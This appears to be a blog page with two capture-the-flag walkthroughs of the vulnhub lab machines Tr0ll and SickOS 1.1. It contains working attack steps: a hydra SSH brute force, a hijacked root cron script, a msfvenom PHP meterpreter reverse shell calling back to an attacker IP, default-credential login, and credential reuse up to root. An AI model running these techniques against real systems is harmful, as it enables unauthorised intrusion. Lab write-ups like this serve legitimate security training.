tr0ll

Okay this is a new box so we need to run nmap on the box πŸ™‚
There is three ports open, 21, 22 and 80.
The website just trolls us.
The ftp is anonymous readable so we can check if there is something there.
There is a file named lol.pcap. This is interesting.
The pcap is someone connecting to the ftp and downloading super_secret.txt
Since the ftp protocol is not encrypted we can see the content of the file downloaded πŸ™‚

In wireshark just go. Statistics > Conversations > TCP
You can see there is 4 tcp conversation. we one we are interested in is the 3rd.

This gives us the content of the file:
Well, well, well, aren’t you just a clever little devil, you almost found the sup3rs3cr3tdirlol πŸ˜›

Sucks, you were so close… gotta TRY HARDER!
.
we need to find the sup3rs3cr3tdirlol
just go browse http://192.168.0.59/sup3rs3cr3tdirlol/
You can download a 32 bit executable roflmao there and run it.
When the program is run it prints out this : Find address 0x0856BF to proceed
This could normally be a memory address but since we cant read the memory on the target it must be something else.
This could be a browser address !
Browsing to http://192.168.0.59/0x0856BF/
Gives us 2 folders. Good_luck and this_folder_contains_the_password
The first gives us a list of username.
maleus
ps-aux
felux
Eagle11
genphlux < — Definitely not this one
usmc8892
blawrg
wytshadow
vis1t0r
overflow

The second gives us a file named Pass.txt containing Good_job_:).
Since this is a troll machine we need to take this literally. The folder contain the file named Pass.txt.
I created two file one with list of users and one with a list of passwords.

hydra -L user -P password -V 192.168.0.59 ssh -t 1

By bruteforcing with hydra we found the real password to log into ssh was overflow // Pass.txt
[22][ssh] host: 192.168.0.59 login: overflow password: Pass.txt
Now we need to do a lot of enumeration, Best guide i have is from g0tmi1k
https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/
By checking all the config file, i finally came accros something that looked strange.
in /lib/log There was a folder named cleaner.py, this is why we get our stuff deleted in /tmp
But this file is writable by anyone! and root execute it sometimes to clean the /tmp directory.
I used this python shell to give me a shell as root:
https://www.trustedsec.com/files/RevShell_PoC_v1.py
I just replaced it with this script to get a root reverse shell πŸ˜›
you just need to listen for the incoming connection like this.

nc -lnvp 443

Since you are root you can read the content of /root/proof.txt
Good job, you did it!
702a8c18d29c6f3ca0d99ef5712bfbdc

Advertisements

SickOS

SickOS

I Hacked SickOS VM on vulnhub.com, Here is how a did it.

I Started by doing a nmap scan on the box

There is a squid running on the box.
A squid server is a proxy server so lets configure our browser to pass by the proxy
Once you set the proxy you can browse to the real website at http://192.168.101.229/ . The reason for this is because the website if not open from the outside, by using its own proxy we can reach the web server.

http://192.168.101.229/robots.txt
in the robots.txt there is a fileda called /wolfcms/
naturally we check on exploit-db if there are a version vulnerable to help us attacking the system.
Exploit-DB Exploit
From there i saw the path to the admin web panel.
“GET {$path}/?/admin/plugin/file_manager HTTP/1.1rn”;
So we browse http://192.168.101.229/wolfcms/?/admin/
We are granted a login page.
I googled for the default password for wolfcms wich is admin // admin.
In the web application there is a way to upload a file.

Lets generate a php meterpreter so that we have a shell access on the system.

msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.101.3 LPORT=443 -o phpmeter.php

If we upload the phpmeter.php
we can fetch it using http://192.168.101.229/public/phpmeter.php
This gives us a reverse shell as www-data.

python -c 'import pty;pty.spawn(a"/bin/bash")'

From this shell we can read the configuration of the web server including, the root password for mysql.
in /var/www/wolfcmd/config.php we can see the database configuration

// Database settings:
define('DB_DSN', 'mysql:dbname=wolf;host=localhost;port=3306');
define('DB_USER', 'root');
define('DB_PASS', 'john@123');
define('TABLE_PREFIX', '');

So the root password for the database is john@123
By doing some enumeration on the system we can see there is an additional user named sickos, we can read the file at /etc/passwd or ls /home/
#People tend to reuse their password so we can try to log with the sickos user,
su sickos and password john@123
#Since the person who created this wasn’t careful about security, this is the default account he created, by default the main account is member of sudoers.
his means we can run any command as root on the system.
We can verify if we are in the sudoers group by doing this command.

sudo -l

User sickos may run the following commands on this host:
(ALL : ALL) ALL

This means we can switch user and login as the root account with the password john@123
sudo su to get a shell as root!

cat /root/a0216ea4d51874464078c618298b1367.txt

'If you are viewing this!!

ROOT!

You have Succesfully completed SickOS1.1.
Thanks for Trying